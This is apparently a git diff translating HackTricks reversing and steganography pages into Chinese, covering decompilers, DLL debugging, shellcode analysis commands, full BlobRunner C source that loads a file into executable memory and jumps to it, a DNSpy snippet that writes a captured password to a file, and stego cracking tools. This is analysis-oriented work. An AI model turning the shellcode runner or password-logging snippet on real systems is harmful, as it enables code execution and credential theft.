+r = [ [ m.evaluate(X[i][j]) for j in range(9) ]
+for i in range(9) ]
+print_matrix(r)
 else:
-    print "failed to solve"
+print "failed to solve"
 ```
-
-## References
+## 参考文献
 
 - [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index 6d380db1c..105d5f0b1 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -1,33 +1,33 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Wasm Decompilation and Wat Compilation Guide
+# Wasm 反编译和 Wat 编译指南
 
-In the realm of **WebAssembly**, tools for **decompiling** and **compiling** are essential for developers. This guide introduces some online resources and software for handling **Wasm (WebAssembly binary)** and **Wat (WebAssembly text)** files.
+在 **WebAssembly** 领域，反编译和编译工具对开发者至关重要。本指南介绍了一些处理 **Wasm (WebAssembly 二进制)** 和 **Wat (WebAssembly 文本)** 文件的在线资源和软件。
 
-## Online Tools
+## 在线工具
 
-- To **decompile** Wasm to Wat, the tool available at [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) comes in handy.
-- For **compiling** Wat back to Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) serves the purpose.
-- Another decompilation option can be found at [web-wasmdec](https://wwwg.github.io/web-wasmdec/).
+- 要将 Wasm 反编译为 Wat，可以使用 [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)。
+- 要将 Wat 编译回 Wasm，可以使用 [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/)。
+- 另一个反编译选项可以在 [web-wasmdec](https://wwwg.github.io/web-wasmdec/) 找到。
 
-## Software Solutions
+## 软件解决方案
 
-- For a more robust solution, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) offers extensive features.
-- The open-source project [wasmdec](https://github.com/wwwg/wasmdec) is also available for decompilation tasks.
+- 对于更强大的解决方案，[JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) 提供了广泛的功能。
+- 开源项目 [wasmdec](https://github.com/wwwg/wasmdec) 也可用于反编译任务。
 
-# .Net Decompilation Resources
+# .Net 反编译资源
 
-Decompiling .Net assemblies can be accomplished with tools such as:
+反编译 .Net 程序集可以使用以下工具：
 
-- [ILSpy](https://github.com/icsharpcode/ILSpy), which also offers a [plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode), allowing cross-platform usage.
-- For tasks involving **decompilation**, **modification**, and **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) is highly recommended. **Right-clicking** a method and choosing **Modify Method** enables code changes.
-- [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) is another alternative for decompiling .Net assemblies.
+- [ILSpy](https://github.com/icsharpcode/ILSpy)，它还提供了 [Visual Studio Code 插件](https://github.com/icsharpcode/ilspy-vscode)，允许跨平台使用。
+- 对于涉及 **反编译**、**修改** 和 **重新编译** 的任务，强烈推荐 [dnSpy](https://github.com/0xd4d/dnSpy/releases)。**右键单击** 方法并选择 **修改方法** 可以进行代码更改。
+- [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) 是另一个反编译 .Net 程序集的替代方案。
 
-## Enhancing Debugging and Logging with DNSpy
+## 使用 DNSpy 增强调试和日志记录
 
-### DNSpy Logging
+### DNSpy 日志记录
 
-To log information to a file using DNSpy, incorporate the following .Net code snippet:
+要使用 DNSpy 将信息记录到文件中，可以加入以下 .Net 代码片段：
 
 %%%cpp
 using System.IO;
@@ -35,81 +35,80 @@ path = "C:\\inetpub\\temp\\MyTest2.txt";
 File.AppendAllText(path, "Password: " + password + "\n");
 %%%
 
-### DNSpy Debugging
+### DNSpy 调试
 
-For effective debugging with DNSpy, a sequence of steps is recommended to adjust **Assembly attributes** for debugging, ensuring that optimizations that could hinder debugging are disabled. This process includes changing the `DebuggableAttribute` settings, recompiling the assembly, and saving the changes.
+为了有效地使用 DNSpy 进行调试，建议按照一系列步骤调整 **程序集属性** 以进行调试，确保禁用可能妨碍调试的优化。此过程包括更改 `DebuggableAttribute` 设置、重新编译程序集并保存更改。
 
-Moreover, to debug a .Net application run by **IIS**, executing `iisreset /noforce` restarts IIS. To attach DNSpy to the IIS process for debugging, the guide instructs on selecting the **w3wp.exe** process within DNSpy and starting the debugging session.
+此外，要调试由 **IIS** 运行的 .Net 应用程序，执行 `iisreset /noforce` 以重启 IIS。要将 DNSpy 附加到 IIS 进程进行调试，指南指示在 DNSpy 中选择 **w3wp.exe** 进程并开始调试会话。
 
-For a comprehensive view of loaded modules during debugging, accessing the **Modules** window in DNSpy is advised, followed by opening all modules and sorting assemblies for easier navigation and debugging.
+为了在调试期间全面查看加载的模块，建议访问 DNSpy 中的 **模块** 窗口，然后打开所有模块并对程序集进行排序，以便于导航和调试。
 
-This guide encapsulates the essence of WebAssembly and .Net decompilation, offering a pathway for developers to navigate these tasks with ease.
+本指南概括了 WebAssembly 和 .Net 反编译的本质，为开发者提供了轻松处理这些任务的途径。
 
-## **Java Decompiler**
+## **Java 反编译器**
 
-To decompile Java bytecode, these tools can be very helpful:
+要反编译 Java 字节码，这些工具非常有用：
 
 - [jadx](https://github.com/skylot/jadx)
 - [JD-GUI](https://github.com/java-decompiler/jd-gui/releases)
 
-## **Debugging DLLs**
+## **调试 DLL**
 
-### Using IDA
+### 使用 IDA
 
-- **Rundll32** is loaded from specific paths for 64-bit and 32-bit versions.
-- **Windbg** is selected as the debugger with the option to suspend on library load/unload enabled.
-- Execution parameters include the DLL path and function name. This setup halts execution upon each DLL's loading.
+- **Rundll32** 从特定路径加载 64 位和 32 位版本。
+- **Windbg** 被选为调试器，并启用了在库加载/卸载时暂停的选项。
+- 执行参数包括 DLL 路径和函数名称。此设置在每个 DLL 加载时暂停执行。
 
-### Using x64dbg/x32dbg
+### 使用 x64dbg/x32dbg
 
-- Similar to IDA, **rundll32** is loaded with command line modifications to specify the DLL and function.
-- Settings are adjusted to break on DLL entry, allowing breakpoint setting at the desired DLL entry point.
+- 类似于 IDA，**rundll32** 通过命令行修改加载 DLL 和函数。
+- 设置调整为在 DLL 入口处中断，允许在所需的 DLL 入口点设置断点。
 
-### Images
+### 图像
 
-- Execution stopping points and configurations are illustrated through screenshots.
+- 执行停止点和配置通过截图进行说明。
 
 ## **ARM & MIPS**
 
-- For emulation, [arm_now](https://github.com/nongiach/arm_now) is a useful resource.
+- 对于仿真，[arm_now](https://github.com/nongiach/arm_now) 是一个有用的资源。
 
 ## **Shellcodes**
 
-### Debugging Techniques
+### 调试技术
 
-- **Blobrunner** and **jmp2it** are tools for allocating shellcodes in memory and debugging them with Ida or x64dbg.
-  - Blobrunner [releases](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)
-  - jmp2it [compiled version](https://github.com/adamkramer/jmp2it/releases/)
-- **Cutter** offers GUI-based shellcode emulation and inspection, highlighting differences in shellcode handling as a file versus direct shellcode.
+- **Blobrunner** 和 **jmp2it** 是用于在内存中分配 shellcodes 并使用 Ida 或 x64dbg 调试它们的工具。
+- Blobrunner [发布](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)
+- jmp2it [编译版本](https://github.com/adamkramer/jmp2it/releases/)
+- **Cutter** 提供基于 GUI 的 shellcode 仿真和检查，突出显示作为文件与直接 shellcode 处理的差异。
 
-### Deobfuscation and Analysis
+### 去混淆和分析
 
-- **scdbg** provides insights into shellcode functions and deobfuscation capabilities.
-  %%%bash
-  scdbg.exe -f shellcode # Basic info
-  scdbg.exe -f shellcode -r # Analysis report
-  scdbg.exe -f shellcode -i -r # Interactive hooks
-  scdbg.exe -f shellcode -d # Dump decoded shellcode
-  scdbg.exe -f shellcode /findsc # Find start offset
-  scdbg.exe -f shellcode /foff 0x0000004D # Execute from offset
-  %%%
+- **scdbg** 提供对 shellcode 函数和去混淆能力的洞察。
+%%%bash
+scdbg.exe -f shellcode # 基本信息
+scdbg.exe -f shellcode -r # 分析报告
+scdbg.exe -f shellcode -i -r # 交互式钩子
+scdbg.exe -f shellcode -d # 转储解码的 shellcode
+scdbg.exe -f shellcode /findsc # 查找起始偏移
+scdbg.exe -f shellcode /foff 0x0000004D # 从偏移执行
+%%%
 
-- **CyberChef** for disassembling shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
+- **CyberChef** 用于反汇编 shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
 
 ## **Movfuscator**
 
-- An obfuscator that replaces all instructions with `mov`.
-- Useful resources include a [YouTube explanation](https://www.youtube.com/watch?v=2VF_wPkiBJY) and [PDF slides](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf).
-- **demovfuscator** might reverse movfuscator's obfuscation, requiring dependencies like `libcapstone-dev` and `libz3-dev`, and installing [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md).
+- 一种将所有指令替换为 `mov` 的混淆器。
+- 有用的资源包括 [YouTube 解释](https://www.youtube.com/watch?v=2VF_wPkiBJY) 和 [PDF 幻灯片](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf)。
+- **demovfuscator** 可能会逆转 movfuscator 的混淆，需要依赖项如 `libcapstone-dev` 和 `libz3-dev`，并安装 [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md)。
 
 ## **Delphi**
 
-- For Delphi binaries, [IDR](https://github.com/crypto2011/IDR) is recommended.
+- 对于 Delphi 二进制文件，推荐使用 [IDR](https://github.com/crypto2011/IDR)。
 
-# Courses
+# 课程
 
 - [https://github.com/0xZ0F/Z0FCourse_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
-- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(Binary deobfuscation\)
+- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(二进制去混淆\)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/reversing-tools/blobrunner.md b/src/reversing/reversing-tools/blobrunner.md
index 88542d62a..260e76697 100644
--- a/src/reversing/reversing-tools/blobrunner.md
+++ b/src/reversing/reversing-tools/blobrunner.md
@@ -1,8 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The only modified line from the [original code](https://github.com/OALabs/BlobRunner) is the line 10.  
-In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**.
-
+从[原始代码](https://github.com/OALabs/BlobRunner)中唯一修改的行是第10行。为了编译它，只需**在Visual Studio Code中创建一个C/C++项目，复制并粘贴代码并构建它**。
 ```c
 #include <stdio.h>
 #include <windows.h>
@@ -29,183 +27,181 @@ const char* _banner = " __________.__        ___.  __________\n"
 
 
 void banner() {
-	system("cls");
-	printf(_banner, _version);
-	return;
+system("cls");
+printf(_banner, _version);
+return;
 }
 
 LPVOID process_file(char* inputfile_name, bool jit, int offset, bool debug) {
-	LPVOID lpvBase;
-	FILE* file;
-	unsigned long fileLen;
-	char* buffer;
-	DWORD dummy;
+LPVOID lpvBase;
+FILE* file;
+unsigned long fileLen;
+char* buffer;
+DWORD dummy;
 
-	file = fopen(inputfile_name, "rb");
+file = fopen(inputfile_name, "rb");
 
-	if (!file) {
-		printf(" [!] Error: Unable to open %s\n", inputfile_name);
+if (!file) {
+printf(" [!] Error: Unable to open %s\n", inputfile_name);
 
-		return (LPVOID)NULL;
-	}
+return (LPVOID)NULL;
+}
 
-	printf(" [*] Reading file...\n");
-	fseek(file, 0, SEEK_END);
-	fileLen = ftell(file); //Get Length
+printf(" [*] Reading file...\n");
+fseek(file, 0, SEEK_END);
+fileLen = ftell(file); //Get Length
 
-	printf(" [*] File Size: 0x%04x\n", fileLen);
-	fseek(file, 0, SEEK_SET); //Reset
+printf(" [*] File Size: 0x%04x\n", fileLen);
+fseek(file, 0, SEEK_SET); //Reset
 
-	fileLen += 1;
+fileLen += 1;
 
-	buffer = (char*)malloc(fileLen); //Create Buffer
-	fread(buffer, fileLen, 1, file);
-	fclose(file);
+buffer = (char*)malloc(fileLen); //Create Buffer
+fread(buffer, fileLen, 1, file);
+fclose(file);
 
-	printf(" [*] Allocating Memory...");
+printf(" [*] Allocating Memory...");
 
-	lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40);
+lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40);
 
-	printf(".Allocated!\n");
-	printf(" [*]   |-Base: 0x%08x\n", (int)(size_t)lpvBase);
-	printf(" [*] Copying input data...\n");
+printf(".Allocated!\n");
+printf(" [*]   |-Base: 0x%08x\n", (int)(size_t)lpvBase);
+printf(" [*] Copying input data...\n");
 
-	CopyMemory(lpvBase, buffer, fileLen);
-	return lpvBase;
+CopyMemory(lpvBase, buffer, fileLen);
+return lpvBase;
 }
 
 void execute(LPVOID base, int offset, bool nopause, bool jit, bool debug)
 {
-	LPVOID shell_entry;
+LPVOID shell_entry;
 
 #ifdef _WIN64
-	DWORD   thread_id;
-	HANDLE  thread_handle;
-	const char msg[] = " [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\n";
+DWORD   thread_id;
+HANDLE  thread_handle;
+const char msg[] = " [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\n";
 #else
-	const char msg[] = " [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\n";
+const char msg[] = " [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\n";
 #endif
 
-	shell_entry = (LPVOID)((UINT_PTR)base + offset);
+shell_entry = (LPVOID)((UINT_PTR)base + offset);
 
 #ifdef _WIN64
 
-	printf(" [*] Creating Suspended Thread...\n");
-	thread_handle = CreateThread(
-		NULL,          // Attributes
-		0,             // Stack size (Default)
-		shell_entry,         // Thread EP
-		NULL,          // Arguments
-		0x4,           // Create Suspended
-		&thread_id);   // Thread identifier
+printf(" [*] Creating Suspended Thread...\n");
+thread_handle = CreateThread(
+NULL,          // Attributes
+0,             // Stack size (Default)
+shell_entry,         // Thread EP
+NULL,          // Arguments
+0x4,           // Create Suspended
+&thread_id);   // Thread identifier
 
-	if (thread_handle == NULL) {
-		printf(" [!] Error Creating thread...");
-		return;
-	}
-	printf(" [*] Created Thread: [%d]\n", thread_id);
-	printf(" [*] Thread Entry: 0x%016x\n", (int)(size_t)shell_entry);
+if (thread_handle == NULL) {
+printf(" [!] Error Creating thread...");
+return;
+}
+printf(" [*] Created Thread: [%d]\n", thread_id);
+printf(" [*] Thread Entry: 0x%016x\n", (int)(size_t)shell_entry);
 
 #endif
 
-	if (nopause == false) {
-		printf("%s", msg);
-		getchar();
-	}
-	else
-	{
-		if (jit == true) {
-			// Force an exception by making the first byte not executable.
-			// This will cause
-			DWORD oldp;
+if (nopause == false) {
+printf("%s", msg);
+getchar();
+}
+else
+{
+if (jit == true) {
+// Force an exception by making the first byte not executable.
+// This will cause
+DWORD oldp;
 
-			printf(" [*] Removing EXECUTE access to trigger exception...\n");
+printf(" [*] Removing EXECUTE access to trigger exception...\n");
 
-			VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);
-		}
-	}
+VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);
+}
+}
 
 #ifdef _WIN64
-	printf(" [*] Resuming Thread..\n");
-	ResumeThread(thread_handle);
+printf(" [*] Resuming Thread..\n");
+ResumeThread(thread_handle);
 #else
-	printf(" [*] Entry: 0x%08x\n", (int)(size_t)shell_entry);
-	printf(" [*] Jumping to shellcode\n");
-	__asm jmp shell_entry;
+printf(" [*] Entry: 0x%08x\n", (int)(size_t)shell_entry);
+printf(" [*] Jumping to shellcode\n");
+__asm jmp shell_entry;
 #endif
 }
 
 void print_help() {
-	printf(" [!] Error: No file!\n\n");
-	printf("     Required args: <inputfile>\n\n");
-	printf("     Optional Args:\n");
-	printf("         --offset <offset> The offset to jump into.\n");
-	printf("         --nopause         Don't pause before jumping to shellcode. Danger!!! \n");
-	printf("         --jit             Forces an exception by removing the EXECUTE permission from the alloacted memory.\n");
-	printf("         --debug           Verbose logging.\n");
-	printf("         --version         Print version and exit.\n\n");
+printf(" [!] Error: No file!\n\n");
+printf("     Required args: <inputfile>\n\n");
+printf("     Optional Args:\n");
+printf("         --offset <offset> The offset to jump into.\n");
+printf("         --nopause         Don't pause before jumping to shellcode. Danger!!! \n");
+printf("         --jit             Forces an exception by removing the EXECUTE permission from the alloacted memory.\n");
+printf("         --debug           Verbose logging.\n");
+printf("         --version         Print version and exit.\n\n");
 }
 
 int main(int argc, char* argv[])
 {
-	LPVOID base;
-	int i;
-	int offset = 0;
-	bool nopause = false;
-	bool debug = false;
-	bool jit = false;
-	char* nptr;
+LPVOID base;
+int i;
+int offset = 0;
+bool nopause = false;
+bool debug = false;
+bool jit = false;
+char* nptr;
 
-	banner();
+banner();
 
-	if (argc < 2) {
-		print_help();
-		return -1;
-	}
+if (argc < 2) {
+print_help();
+return -1;
+}
 
-	printf(" [*] Using file: %s \n", argv[1]);
+printf(" [*] Using file: %s \n", argv[1]);
 
-	for (i = 2; i < argc; i++) {
-		if (strcmp(argv[i], "--offset") == 0) {
-			printf(" [*] Parsing offset...\n");
-			i = i + 1;
-			if (strncmp(argv[i], "0x", 2) == 0) {
-			    offset = strtol(argv[i], &nptr, 16);
-            }
-			else {
-			    offset = strtol(argv[i], &nptr, 10);
-			}
-		}
-		else if (strcmp(argv[i], "--nopause") == 0) {
-			nopause = true;
-		}
-		else if (strcmp(argv[i], "--jit") == 0) {
-			jit = true;
-			nopause = true;
-		}
-		else if (strcmp(argv[i], "--debug") == 0) {
-			debug = true;
-		}
-		else if (strcmp(argv[i], "--version") == 0) {
-			printf("Version: %s", _version);
-		}
-		else {
-			printf("[!] Warning: Unknown arg: %s\n", argv[i]);
-		}
-	}
+for (i = 2; i < argc; i++) {
+if (strcmp(argv[i], "--offset") == 0) {
+printf(" [*] Parsing offset...\n");
+i = i + 1;
+if (strncmp(argv[i], "0x", 2) == 0) {
+offset = strtol(argv[i], &nptr, 16);
+}
+else {
+offset = strtol(argv[i], &nptr, 10);
+}
+}
+else if (strcmp(argv[i], "--nopause") == 0) {
+nopause = true;
+}
+else if (strcmp(argv[i], "--jit") == 0) {
+jit = true;
+nopause = true;
+}
+else if (strcmp(argv[i], "--debug") == 0) {
+debug = true;
+}
+else if (strcmp(argv[i], "--version") == 0) {
+printf("Version: %s", _version);
+}
+else {
+printf("[!] Warning: Unknown arg: %s\n", argv[i]);
+}
+}
 
-	base = process_file(argv[1], jit, offset, debug);
-	if (base == NULL) {
-		printf(" [!] Exiting...");
-		return -1;
-	}
-	printf(" [*] Using offset: 0x%08x\n", offset);
-	execute(base, offset, nopause, jit, debug);
-	printf("Pausing - Press any key to quit.\n");
-	getchar();
-	return 0;
+base = process_file(argv[1], jit, offset, debug);
+if (base == NULL) {
+printf(" [!] Exiting...");
+return -1;
+}
+printf(" [*] Using offset: 0x%08x\n", offset);
+execute(base, offset, nopause, jit, debug);
+printf("Pausing - Press any key to quit.\n");
+getchar();
+return 0;
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing/word-macros.md b/src/reversing/word-macros.md
index b6a9c2f09..11a7eaea6 100644
--- a/src/reversing/word-macros.md
+++ b/src/reversing/word-macros.md
@@ -2,18 +2,17 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Junk Code
+### 垃圾代码
 
-It's very common to find **junk code that is never used** to make the reversing of the macro more difficult.\
-For example, in the following image you can see that and If that is never going to be true is used to execute some junk and useless code.
+很常见会发现**从未使用的垃圾代码**，以使宏的逆向工程更加困难。\
+例如，在下面的图像中，可以看到一个永远不会为真的 If 被用来执行一些垃圾和无用的代码。
 
 ![](<../images/image (369).png>)
 
-### Macro Forms
+### 宏表单
 
-Using the **GetObject** function it's possible to obtain data from forms of the macro. This can be used to difficult the analysis. The following is a photo of a macro form used to **hide data inside text boxes** (a text box can be hiding other text boxes):
+使用**GetObject**函数可以从宏的表单中获取数据。这可以用来增加分析的难度。以下是一个宏表单的照片，用于**在文本框内隐藏数据**（一个文本框可以隐藏其他文本框）：
 
 ![](<../images/image (344).png>)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md
index 1309f8212..8b5d3fd07 100644
--- a/src/stego/esoteric-languages.md
+++ b/src/stego/esoteric-languages.md
@@ -1,18 +1,16 @@
-# Esoteric languages
+# 隐秘语言
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## [Esolangs Wiki](https://esolangs.org/wiki/Main_Page)
 
-Check that wiki to search more esotreic languages
+查看该维基以搜索更多隐秘语言
 
 ## Malbolge
-
 ```
 ('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=<M:9wv6WsU2T|nm-,jcL(I&%$#"
 `CB]V?Tx<uVtT`Rpo3NlF.Jh++FdbCBA@?]!~|4XzyTT43Qsqq(Lnmkj"Fhg${z@>
 ```
-
 [http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl)
 
 ## npiet
@@ -22,7 +20,6 @@ Check that wiki to search more esotreic languages
 [https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
 
 ## Rockstar
-
 ```
 Midnight takes your heart and your soul
 While your heart is as high as your soul
@@ -51,11 +48,9 @@ Take it to the top
 
 Whisper my world
 ```
-
 {% embed url="https://codewithrockstar.com/" %}
 
 ## PETOOH
-
 ```
 KoKoKoKoKoKoKoKoKoKo Kud-Kudah
 KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah
@@ -65,6 +60,4 @@ KoKoKoKo Kud-Kudah KoKoKoKo kudah kO kud-Kudah kO Kukarek
 kOkOkOkOkO Kukarek Kukarek kOkOkOkOkOkOkO
 Kukarek
 ```
-
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/stego/stego-tricks.md b/src/stego/stego-tricks.md
index 81d967435..75a3918bb 100644
--- a/src/stego/stego-tricks.md
+++ b/src/stego/stego-tricks.md
@@ -2,50 +2,41 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Extracting Data from Files**
+## **从文件中提取数据**
 
 ### **Binwalk**
 
-A tool for searching binary files for embedded hidden files and data. It's installed via `apt` and its source is available on [GitHub](https://github.com/ReFirmLabs/binwalk).
-
+一个用于搜索二进制文件中嵌入的隐藏文件和数据的工具。它通过 `apt` 安装，源代码可在 [GitHub](https://github.com/ReFirmLabs/binwalk) 上获取。
 ```bash
 binwalk file # Displays the embedded data
 binwalk -e file # Extracts the data
 binwalk --dd ".*" file # Extracts all data
 ```
-
 ### **Foremost**
 
-Recovers files based on their headers and footers, useful for png images. Installed via `apt` with its source on [GitHub](https://github.com/korczis/foremost).
-
+根据文件的头部和尾部恢复文件，对 png 图像非常有用。通过 `apt` 安装，源代码在 [GitHub](https://github.com/korczis/foremost) 上。
 ```bash
 foremost -i file # Extracts data
 ```
-
 ### **Exiftool**
 
-Helps to view file metadata, available [here](https://www.sno.phy.queensu.ca/~phil/exiftool/).
-
+帮助查看文件元数据，访问 [这里](https://www.sno.phy.queensu.ca/~phil/exiftool/)。
 ```bash
 exiftool file # Shows the metadata
 ```
-
 ### **Exiv2**
 
-Similar to exiftool, for metadata viewing. Installable via `apt`, source on [GitHub](https://github.com/Exiv2/exiv2), and has an [official website](http://www.exiv2.org/).
-
+类似于 exiftool，用于查看元数据。可以通过 `apt` 安装，源代码在 [GitHub](https://github.com/Exiv2/exiv2)，并且有一个 [官方网站](http://www.exiv2.org/)。
 ```bash
 exiv2 file # Shows the metadata
 ```
+### **文件**
 
-### **File**
+识别您正在处理的文件类型。
 
-Identify the type of file you're dealing with.
-
-### **Strings**
-
-Extracts readable strings from files, using various encoding settings to filter the output.
+### **字符串**
 
+从文件中提取可读字符串，使用各种编码设置来过滤输出。
 ```bash
 strings -n 6 file # Extracts strings with a minimum length of 6
 strings -n 6 file | head -n 20 # First 20 strings
@@ -57,95 +48,84 @@ strings -e b -n 6 file # 16bit strings (big-endian)
 strings -e L -n 6 file # 32bit strings (little-endian)
 strings -e B -n 6 file # 32bit strings (big-endian)
 ```
+### **比较 (cmp)**
 
-### **Comparison (cmp)**
-
-Useful for comparing a modified file with its original version found online.
-
+用于将修改过的文件与在线找到的原始版本进行比较。
 ```bash
 cmp original.jpg stego.jpg -b -l
 ```
+## **提取文本中的隐藏数据**
 
-## **Extracting Hidden Data in Text**
+### **空格中的隐藏数据**
 
-### **Hidden Data in Spaces**
+看似空白的空间中的不可见字符可能隐藏着信息。要提取这些数据，请访问 [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)。
 
-Invisible characters in seemingly empty spaces may hide information. To extract this data, visit [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder).
+## **从图像中提取数据**
 
-## **Extracting Data from Images**
-
-### **Identifying Image Details with GraphicMagick**
-
-[GraphicMagick](https://imagemagick.org/script/download.php) serves to determine image file types and identify potential corruption. Execute the command below to inspect an image:
+### **使用 GraphicMagick 识别图像细节**
 
+[GraphicMagick](https://imagemagick.org/script/download.php) 用于确定图像文件类型并识别潜在的损坏。执行以下命令以检查图像：
 ```bash
 ./magick identify -verbose stego.jpg
 ```
-
-To attempt repair on a damaged image, adding a metadata comment might help:
-
+要尝试修复损坏的图像，添加元数据注释可能会有所帮助：
 ```bash
 ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
 ```
+### **Steghide用于数据隐藏**
 
-### **Steghide for Data Concealment**
+Steghide 方便地在 `JPEG, BMP, WAV, 和 AU` 文件中隐藏数据，能够嵌入和提取加密数据。使用 `apt` 安装非常简单，其 [源代码可在 GitHub 上获取](https://github.com/StefanoDeVuono/steghide)。
 
-Steghide facilitates hiding data within `JPEG, BMP, WAV, and AU` files, capable of embedding and extracting encrypted data. Installation is straightforward using `apt`, and its [source code is available on GitHub](https://github.com/StefanoDeVuono/steghide).
+**命令：**
 
-**Commands:**
+- `steghide info file` 显示文件是否包含隐藏数据。
+- `steghide extract -sf file [--passphrase password]` 提取隐藏数据，密码可选。
 
-- `steghide info file` reveals if a file contains hidden data.
-- `steghide extract -sf file [--passphrase password]` extracts the hidden data, password optional.
+要进行基于网页的提取，请访问 [此网站](https://futureboy.us/stegano/decinput.html)。
 
-For web-based extraction, visit [this website](https://futureboy.us/stegano/decinput.html).
-
-**Bruteforce Attack with Stegcracker:**
-
-- To attempt password cracking on Steghide, use [stegcracker](https://github.com/Paradoxis/StegCracker.git) as follows:
+**使用 Stegcracker 进行暴力破解攻击：**
 
+- 要尝试对 Steghide 进行密码破解，请使用 [stegcracker](https://github.com/Paradoxis/StegCracker.git) 如下：
 ```bash
 stegcracker <file> [<wordlist>]
 ```
+### **zsteg用于PNG和BMP文件**
 
-### **zsteg for PNG and BMP Files**
+zsteg专注于揭示PNG和BMP文件中的隐藏数据。安装通过`gem install zsteg`完成，其[源代码在GitHub上](https://github.com/zed-0xff/zsteg)。
 
-zsteg specializes in uncovering hidden data in PNG and BMP files. Installation is done via `gem install zsteg`, with its [source on GitHub](https://github.com/zed-0xff/zsteg).
+**命令：**
 
-**Commands:**
+- `zsteg -a file`对文件应用所有检测方法。
+- `zsteg -E file`指定用于数据提取的有效载荷。
 
-- `zsteg -a file` applies all detection methods on a file.
-- `zsteg -E file` specifies a payload for data extraction.
+### **StegoVeritas和Stegsolve**
 
-### **StegoVeritas and Stegsolve**
+**stegoVeritas**检查元数据，执行图像转换，并应用LSB暴力破解等功能。使用`stegoveritas.py -h`获取完整选项列表，使用`stegoveritas.py stego.jpg`执行所有检查。
 
-**stegoVeritas** checks metadata, performs image transformations, and applies LSB brute forcing among other features. Use `stegoveritas.py -h` for a full list of options and `stegoveritas.py stego.jpg` to execute all checks.
+**Stegsolve**应用各种颜色滤镜以揭示图像中的隐藏文本或消息。它可在[GitHub上](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)获取。
 
-**Stegsolve** applies various color filters to reveal hidden texts or messages within images. It's available on [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve).
+### **FFT用于隐藏内容检测**
 
-### **FFT for Hidden Content Detection**
+快速傅里叶变换（FFT）技术可以揭示图像中的隐蔽内容。实用资源包括：
 
-Fast Fourier Transform (FFT) techniques can unveil concealed content in images. Useful resources include:
-
-- [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
+- [EPFL演示](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
 - [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/)
-- [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic)
+- [GitHub上的FFTStegPic](https://github.com/0xcomposure/FFTStegPic)
 
-### **Stegpy for Audio and Image Files**
+### **Stegpy用于音频和图像文件**
 
-Stegpy allows embedding information into image and audio files, supporting formats like PNG, BMP, GIF, WebP, and WAV. It's available on [GitHub](https://github.com/dhsdshdhk/stegpy).
+Stegpy允许将信息嵌入图像和音频文件，支持PNG、BMP、GIF、WebP和WAV等格式。它可在[GitHub上](https://github.com/dhsdshdhk/stegpy)获取。
 
